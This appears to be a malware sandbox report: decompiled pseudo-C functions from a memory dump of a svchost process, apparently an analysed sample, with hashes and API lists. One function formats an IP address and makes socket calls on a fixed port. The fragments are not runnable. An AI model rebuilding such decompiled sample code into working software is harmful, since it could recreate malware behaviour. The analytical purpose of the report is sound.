                                                                                                                                                                                                                                                                            0x0401abd5
                                                                                                                                                                                                                                                                            0x0401abdd
                                                                                                                                                                                                                                                                            0x0401abe0
                                                                                                                                                                                                                                                                            0x0401abed
                                                                                                                                                                                                                                                                            0x0401abf5
                                                                                                                                                                                                                                                                            0x0401abf5
                                                                                                                                                                                                                                                                            0x0401ac0c
                                                                                                                                                                                                                                                                            0x0401ac0c
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _memset_strnlen$_strlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1397555153-0
                                                                                                                                                                                                                                                                            • Opcode ID: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                                            • Instruction ID: 9948d87256a1ab2e7e4c421ed80cf7a845357aae833f097959cef4c1dbbed60e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FB17B75E012499FDB14CF90C881BEEF7B1EF48308F14C19AE8596B391D634AA86CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                                                                            			E04012D20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                                                            				intOrPtr _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				intOrPtr _v76;
                                                                                                                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _t115;
                                                                                                                                                                                                                                                                            				intOrPtr _t120;
                                                                                                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                                                                                                            				void* _t148;
                                                                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                                                                            				void* _t203;
                                                                                                                                                                                                                                                                            				void* _t204;
                                                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                                                            				void* _t207;
                                                                                                                                                                                                                                                                            				void* _t209;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t204 = __esi;
                                                                                                                                                                                                                                                                            				_t203 = __edi;
                                                                                                                                                                                                                                                                            				_t151 = __ebx;
                                                                                                                                                                                                                                                                            				_v76 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				while(_a4 != 0) {
                                                                                                                                                                                                                                                                            					_t115 = E040070A0( *((intOrPtr*)(_a4 + 4)));
                                                                                                                                                                                                                                                                            					_t206 = _t205 + 4;
                                                                                                                                                                                                                                                                            					_v12 = _t115;
                                                                                                                                                                                                                                                                            					if(_v12 >= 1) {
                                                                                                                                                                                                                                                                            						_v16 = 0xffffffff;
                                                                                                                                                                                                                                                                            						_v28 = 0;
                                                                                                                                                                                                                                                                            						while(_v28 < _v12) {
                                                                                                                                                                                                                                                                            							if( *((char*)( *((intOrPtr*)(_a4 + 4)) + _v28)) != 0x3a) {
                                                                                                                                                                                                                                                                            								_v28 = _v28 + 1;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v16 = _v28;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v16 >= 0) {
                                                                                                                                                                                                                                                                            							_v20 = 0;
                                                                                                                                                                                                                                                                            							_t29 =  *((intOrPtr*)(_a4 + 4)) + 1; // 0x1
                                                                                                                                                                                                                                                                            							_t120 = E0401EBC0(_t151, _t203, _t204, _v16 + _t29, _v12 - _v16 + 1, 0x426f4c,  &_v20);
                                                                                                                                                                                                                                                                            							_t205 = _t206 + 0x10;
                                                                                                                                                                                                                                                                            							_v24 = _t120;
                                                                                                                                                                                                                                                                            							if(_v24 > 0 && _v20 != 0) {
                                                                                                                                                                                                                                                                            								E040228B0(_t151, _t203, _t204, _v20, 4, _v24);
                                                                                                                                                                                                                                                                            								_t207 = _t205 + 0xc;
                                                                                                                                                                                                                                                                            								_v40 = _v24 - 1;
                                                                                                                                                                                                                                                                            								_v44 = 0;
                                                                                                                                                                                                                                                                            								while(_v44 < _v24) {
                                                                                                                                                                                                                                                                            									_t148 = E040070A0( *((intOrPtr*)(_v20 + _v44 * 4)));
                                                                                                                                                                                                                                                                            									_t207 = _t207 + 4;
                                                                                                                                                                                                                                                                            									_v40 = _t148 + _v40;
                                                                                                                                                                                                                                                                            									_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v60 = E04020CE0(_v40 + 1);
                                                                                                                                                                                                                                                                            								_v32 = _v60;
                                                                                                                                                                                                                                                                            								E04007010(_t203, _v32, 0, _v40 + 1);
                                                                                                                                                                                                                                                                            								_t209 = _t207 + 0x10;
                                                                                                                                                                                                                                                                            								_v36 = 0;
                                                                                                                                                                                                                                                                            								_v48 = 0;
                                                                                                                                                                                                                                                                            								while(_v48 < _v24) {
                                                                                                                                                                                                                                                                            									_v52 = E040070A0( *((intOrPtr*)(_v20 + _v48 * 4)));
                                                                                                                                                                                                                                                                            									_push(_v52);
                                                                                                                                                                                                                                                                            									E04006CA0(_t151, _t203, _t204, _v32 + _v36,  *((intOrPtr*)(_v20 + _v48 * 4)));
                                                                                                                                                                                                                                                                            									_t209 = _t209 + 0x10;
                                                                                                                                                                                                                                                                            									_v36 = _v36 + _v52;
                                                                                                                                                                                                                                                                            									 *((char*)(_v32 + _v36)) = 0x20;
                                                                                                                                                                                                                                                                            									_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                            									_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t130 = E04020CE0(8);
                                                                                                                                                                                                                                                                            								_t205 = _t209 + 4;
                                                                                                                                                                                                                                                                            								_v64 = _t130;
                                                                                                                                                                                                                                                                            								if(_v64 == 0) {
                                                                                                                                                                                                                                                                            									_v80 = 0;
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_v80 = E0401F4E0(_v64);
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v8 = _v80;
                                                                                                                                                                                                                                                                            								E0401FC90(_t151, _v8, _t203, _t204, _v32, _v40);
                                                                                                                                                                                                                                                                            								_v56 = 0;
                                                                                                                                                                                                                                                                            								while(_v56 < _v24) {
                                                                                                                                                                                                                                                                            									if( *((intOrPtr*)(_v20 + _v56 * 4)) != 0) {
                                                                                                                                                                                                                                                                            										_v68 =  *((intOrPtr*)(_v20 + _v56 * 4));
                                                                                                                                                                                                                                                                            										E04020CC0(_v68);
                                                                                                                                                                                                                                                                            										_t205 = _t205 + 4;
                                                                                                                                                                                                                                                                            										 *((intOrPtr*)(_v20 + _v56 * 4)) = 0x666;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								if(_v20 != 0) {
                                                                                                                                                                                                                                                                            									_v72 = _v20;
                                                                                                                                                                                                                                                                            									E04020CC0(_v72);
                                                                                                                                                                                                                                                                            									_t205 = _t205 + 4;
                                                                                                                                                                                                                                                                            									_v20 = 0x666;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							if(0 != 0) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L35:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				goto L35;
                                                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                                                            0x04012d20
                                                                                                                                                                                                                                                                            0x04012d20
                                                                                                                                                                                                                                                                            0x04012d20
                                                                                                                                                                                                                                                                            0x04012d26
                                                                                                                                                                                                                                                                            0x04012d29
                                                                                                                                                                                                                                                                            0x04012d30
                                                                                                                                                                                                                                                                            0x04012d42
                                                                                                                                                                                                                                                                            0x04012d47
                                                                                                                                                                                                                                                                            0x04012d4a
                                                                                                                                                                                                                                                                            0x04012d51
                                                                                                                                                                                                                                                                            0x04012d58
                                                                                                                                                                                                                                                                            0x04012d5f
                                                                                                                                                                                                                                                                            0x04012d71
                                                                                                                                                                                                                                                                            0x04012d89
                                                                                                                                                                                                                                                                            0x04012d6e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04012d8b
                                                                                                                                                                                                                                                                            0x04012d8e
                                                                                                                                                                                                                                                                            0x04012d8e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04012d89
                                                                                                                                                                                                                                                                            0x04012d99
                                                                                                                                                                                                                                                                            0x04012da0
                                                                                                                                                                                                                                                                            0x04012dc5
                                                                                                                                                                                                                                                                            0x04012dca
                                                                                                                                                                                                                                                                            0x04012dcf
                                                                                                                                                                                                                                                                            0x04012dd2
                                                                                                                                                                                                                                                                            0x04012dd9
                                                                                                                                                                                                                                                                            0x04012df3
                                                                                                                                                                                                                                                                            0x04012df8
                                                                                                                                                                                                                                                                            0x04012e01
                                                                                                                                                                                                                                                                            0x04012e04
                                                                                                                                                                                                                                                                            0x04012e16
                                                                                                                                                                                                                                                                            0x04012e28
                                                                                                                                                                                                                                                                            0x04012e2d
                                                                                                                                                                                                                                                                            0x04012e33
                                                                                                                                                                                                                                                                            0x04012e13
                                                                                                                                                                                                                                                                            0x04012e13
                                                                                                                                                                                                                                                                            0x04012e47
                                                                                                                                                                                                                                                                            0x04012e4d
                                                                                                                                                                                                                                                                            0x04012e5d
                                                                                                                                                                                                                                                                            0x04012e62
                                                                                                                                                                                                                                                                            0x04012e65
                                                                                                                                                                                                                                                                            0x04012e6c
                                                                                                                                                                                                                                                                            0x04012e7e
                                                                                                                                                                                                                                                                            0x04012e98
                                                                                                                                                                                                                                                                            0x04012e9e
                                                                                                                                                                                                                                                                            0x04012eb0
                                                                                                                                                                                                                                                                            0x04012eb5
                                                                                                                                                                                                                                                                            0x04012ebe
                                                                                                                                                                                                                                                                            0x04012ec7
                                                                                                                                                                                                                                                                            0x04012ed0
                                                                                                                                                                                                                                                                            0x04012e7b
                                                                                                                                                                                                                                                                            0x04012e7b
                                                                                                                                                                                                                                                                            0x04012ed7
                                                                                                                                                                                                                                                                            0x04012edc
                                                                                                                                                                                                                                                                            0x04012edf
                                                                                                                                                                                                                                                                            0x04012ee6
                                                                                                                                                                                                                                                                            0x04012ef5
                                                                                                                                                                                                                                                                            0x04012ee8
                                                                                                                                                                                                                                                                            0x04012ef0
                                                                                                                                                                                                                                                                            0x04012ef0
                                                                                                                                                                                                                                                                            0x04012eff
                                                                                                                                                                                                                                                                            0x04012f0d
                                                                                                                                                                                                                                                                            0x04012f12
                                                                                                                                                                                                                                                                            0x04012f24
                                                                                                                                                                                                                                                                            0x04012f36
                                                                                                                                                                                                                                                                            0x04012f41
                                                                                                                                                                                                                                                                            0x04012f48
                                                                                                                                                                                                                                                                            0x04012f4d
                                                                                                                                                                                                                                                                            0x04012f56
                                                                                                                                                                                                                                                                            0x04012f56
                                                                                                                                                                                                                                                                            0x04012f21
                                                                                                                                                                                                                                                                            0x04012f21
                                                                                                                                                                                                                                                                            0x04012f63
                                                                                                                                                                                                                                                                            0x04012f68
                                                                                                                                                                                                                                                                            0x04012f6f
                                                                                                                                                                                                                                                                            0x04012f74
                                                                                                                                                                                                                                                                            0x04012f77
                                                                                                                                                                                                                                                                            0x04012f77
                                                                                                                                                                                                                                                                            0x04012f63
                                                                                                                                                                                                                                                                            0x04012f80
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04012d9b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04012d53
                                                                                                                                                                                                                                                                            0x04012f86
                                                                                                                                                                                                                                                                            0x04012f8c
                                                                                                                                                                                                                                                                            0x04012f8c
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _strlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4218353326-0
                                                                                                                                                                                                                                                                            • Opcode ID: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                                                                                                            • Instruction ID: b4162b3583ba2dec2d6c765e4cdbb5ffec497666bde8b264905ccdcb2170b9d4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB81D3B4E01209DBDF04CF98D984AEEB7B2BF48308F2485A9E41577390E735AA45DF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: codecvt
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                            • Opcode ID: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                                            • Instruction ID: 8ef4f0843c548fec2a10bde5c14a40ad8c72f7d7392924089e823b54c74d7b66
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E891C774A00208EFDB54DF94C894B9DBBB2FF48354F608259E9156B3A0D775EA82CF90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 52%
                                                                                                                                                                                                                                                                            			E040115C0(void* __ebx, unsigned int** __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                            				unsigned int* _v8;
                                                                                                                                                                                                                                                                            				signed short _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				short _v30;
                                                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                                                            				unsigned int* _v68;
                                                                                                                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                                                                                                                            				unsigned int* _v76;
                                                                                                                                                                                                                                                                            				intOrPtr _v80;
                                                                                                                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                                                                                                                            				unsigned int* _v88;
                                                                                                                                                                                                                                                                            				unsigned int* _v92;
                                                                                                                                                                                                                                                                            				intOrPtr _v96;
                                                                                                                                                                                                                                                                            				unsigned int* _v100;
                                                                                                                                                                                                                                                                            				unsigned int* _v104;
                                                                                                                                                                                                                                                                            				unsigned int** _v108;
                                                                                                                                                                                                                                                                            				unsigned int* _v112;
                                                                                                                                                                                                                                                                            				unsigned int* _v116;
                                                                                                                                                                                                                                                                            				unsigned int* _t84;
                                                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                                                            				void* _t99;
                                                                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                                                            				void* _t153;
                                                                                                                                                                                                                                                                            				signed int _t154;
                                                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                                                            				void* _t160;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_t153 = __esi;
                                                                                                                                                                                                                                                                            				_t152 = __edi;
                                                                                                                                                                                                                                                                            				_t109 = __ebx;
                                                                                                                                                                                                                                                                            				_v16 =  *0x429024 ^ _t154;
                                                                                                                                                                                                                                                                            				_v108 = __ecx;
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                                                            					if(( *_v108)[1] == 0) {
                                                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						_t103 = E040070A0(( *_v108)[1]);
                                                                                                                                                                                                                                                                            						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                                            						_v80 = _t103;
                                                                                                                                                                                                                                                                            						if(_v80 <= 0) {
                                                                                                                                                                                                                                                                            							goto L7;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v84 = E04020CE0(8);
                                                                                                                                                                                                                                                                            							if(_v84 == 0) {
                                                                                                                                                                                                                                                                            								_v112 = 0;
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								_v112 = E0401F4E0(_v84);
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_v8 = _v112;
                                                                                                                                                                                                                                                                            							_t149 =  *_v108;
                                                                                                                                                                                                                                                                            							E0401FC90(_t109, _v8, _t152, _t153, ( *_v108)[1], _v80);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                                                            					_v88 = E04020CE0(0x11);
                                                                                                                                                                                                                                                                            					_v68 = _v88;
                                                                                                                                                                                                                                                                            					E04007010(_t152, _v68, 0, 0x11);
                                                                                                                                                                                                                                                                            					 *0x4251f8(_v68, 0x10, 0x427088, ( *( *_v108) >> 0x00000010 & 0xffff) >> 0x00000008 & 0xff,  *( *_v108) >> 0x00000010 & 0xff, ( *( *_v108) & 0xffff) >> 0x00000008 & 0xff,  *( *_v108) & 0xff);
                                                                                                                                                                                                                                                                            					_t84 = E04020CE0(0x401);
                                                                                                                                                                                                                                                                            					_t155 = _t155 + 0x30;
                                                                                                                                                                                                                                                                            					_v92 = _t84;
                                                                                                                                                                                                                                                                            					_v76 = _v92;
                                                                                                                                                                                                                                                                            					_v12 = 0x6987;
                                                                                                                                                                                                                                                                            					_v32 = 2;
                                                                                                                                                                                                                                                                            					_v28 =  *0x425258(_v68);
                                                                                                                                                                                                                                                                            					_v30 =  *0x425278(_v12 & 0x0000ffff);
                                                                                                                                                                                                                                                                            					_t149 =  &_v64;
                                                                                                                                                                                                                                                                            					_v72 =  *0x425250( &_v32, 0x10, _v76, 0x401,  &_v64, 0x20, 8);
                                                                                                                                                                                                                                                                            					if(_v72 == 0) {
                                                                                                                                                                                                                                                                            						_t97 = E04020CE0(8);
                                                                                                                                                                                                                                                                            						_t160 = _t155 + 4;
                                                                                                                                                                                                                                                                            						_v96 = _t97;
                                                                                                                                                                                                                                                                            						if(_v96 == 0) {
                                                                                                                                                                                                                                                                            							_v116 = 0;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v116 = E0401F4E0(_v96);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t149 = _v116;
                                                                                                                                                                                                                                                                            						_v8 = _v116;
                                                                                                                                                                                                                                                                            						_t99 = E040070A0(_v76);
                                                                                                                                                                                                                                                                            						_t155 = _t160 + 4;
                                                                                                                                                                                                                                                                            						E0401FC90(_t109, _v8, _t152, _t153, _v76, _t99);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v76 != 0) {
                                                                                                                                                                                                                                                                            						_t149 = _v76;
                                                                                                                                                                                                                                                                            						_v100 = _v76;
                                                                                                                                                                                                                                                                            						E04020CC0(_v100);
                                                                                                                                                                                                                                                                            						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                                            						_v76 = 0x666;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v68 != 0) {
                                                                                                                                                                                                                                                                            						_v104 = _v68;
                                                                                                                                                                                                                                                                            						_t149 = _v104;
                                                                                                                                                                                                                                                                            						E04020CC0(_v104);
                                                                                                                                                                                                                                                                            						_t155 = _t155 + 4;
                                                                                                                                                                                                                                                                            						_v68 = 0x666;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				} while (0 != 0);
                                                                                                                                                                                                                                                                            				return E04006C8C(_v8, _t109, _v16 ^ _t154, _t149, _t152, _t153);
                                                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                                                            0x040115c0
                                                                                                                                                                                                                                                                            0x040115c0
                                                                                                                                                                                                                                                                            0x040115c0
                                                                                                                                                                                                                                                                            0x040115cd
                                                                                                                                                                                                                                                                            0x040115d0
                                                                                                                                                                                                                                                                            0x040115d3
                                                                                                                                                                                                                                                                            0x040115da
                                                                                                                                                                                                                                                                            0x040115e3
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040115e5
                                                                                                                                                                                                                                                                            0x040115ee
                                                                                                                                                                                                                                                                            0x040115f3
                                                                                                                                                                                                                                                                            0x040115f6
                                                                                                                                                                                                                                                                            0x040115fd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x040115ff
                                                                                                                                                                                                                                                                            0x04011609
                                                                                                                                                                                                                                                                            0x04011610
                                                                                                                                                                                                                                                                            0x0401161f
                                                                                                                                                                                                                                                                            0x04011612
                                                                                                                                                                                                                                                                            0x0401161a
                                                                                                                                                                                                                                                                            0x0401161a
                                                                                                                                                                                                                                                                            0x04011629
                                                                                                                                                                                                                                                                            0x04011633
                                                                                                                                                                                                                                                                            0x0401163c
                                                                                                                                                                                                                                                                            0x0401163c
                                                                                                                                                                                                                                                                            0x040115fd
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x04011646
                                                                                                                                                                                                                                                                            0x04011650
                                                                                                                                                                                                                                                                            0x04011656
                                                                                                                                                                                                                                                                            0x04011661
                                                                                                                                                                                                                                                                            0x040116e5
                                                                                                                                                                                                                                                                            0x040116f3
                                                                                                                                                                                                                                                                            0x040116f8
                                                                                                                                                                                                                                                                            0x040116fb
                                                                                                                                                                                                                                                                            0x04011701
                                                                                                                                                                                                                                                                            0x04011709
                                                                                                                                                                                                                                                                            0x04011712
                                                                                                                                                                                                                                                                            0x04011720
                                                                                                                                                                                                                                                                            0x0401172e
                                                                                                                                                                                                                                                                            0x04011736
                                                                                                                                                                                                                                                                            0x0401174f
                                                                                                                                                                                                                                                                            0x04011756
                                                                                                                                                                                                                                                                            0x0401175a
                                                                                                                                                                                                                                                                            0x0401175f
                                                                                                                                                                                                                                                                            0x04011762
                                                                                                                                                                                                                                                                            0x04011769
                                                                                                                                                                                                                                                                            0x04011778
                                                                                                                                                                                                                                                                            0x0401176b
                                                                                                                                                                                                                                                                            0x04011773
                                                                                                                                                                                                                                                                            0x04011773
                                                                                                                                                                                                                                                                            0x0401177f
                                                                                                                                                                                                                                                                            0x04011782
                                                                                                                                                                                                                                                                            0x04011789
                                                                                                                                                                                                                                                                            0x0401178e
                                                                                                                                                                                                                                                                            0x04011799
                                                                                                                                                                                                                                                                            0x04011799
                                                                                                                                                                                                                                                                            0x040117a2
                                                                                                                                                                                                                                                                            0x040117a4
                                                                                                                                                                                                                                                                            0x040117a7
                                                                                                                                                                                                                                                                            0x040117ae
                                                                                                                                                                                                                                                                            0x040117b3
                                                                                                                                                                                                                                                                            0x040117b6
                                                                                                                                                                                                                                                                            0x040117b6
                                                                                                                                                                                                                                                                            0x040117c1
                                                                                                                                                                                                                                                                            0x040117c6
                                                                                                                                                                                                                                                                            0x040117c9
                                                                                                                                                                                                                                                                            0x040117cd
                                                                                                                                                                                                                                                                            0x040117d2
                                                                                                                                                                                                                                                                            0x040117d5
                                                                                                                                                                                                                                                                            0x040117d5
                                                                                                                                                                                                                                                                            0x040117dc
                                                                                                                                                                                                                                                                            0x040117f4

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 040115EE
                                                                                                                                                                                                                                                                            • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04011615
                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 04011661
                                                                                                                                                                                                                                                                            • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401176E
                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 04011789
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.813332953.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000004.00000002.813332953.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Iterator_baseIterator_base::__strlenstd::_$_memset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2716363198-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                                            • Instruction ID: 26b02190921c373d841446d0dad60ddd34c3bc106182d84ff6dd49c6febfbb10
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB7128B4E00318DFEB14DFA4D884BADB7B1FF48308F248128E609AB390D775A945DB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                                                            			E04012470(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				intOrPtr _v64;
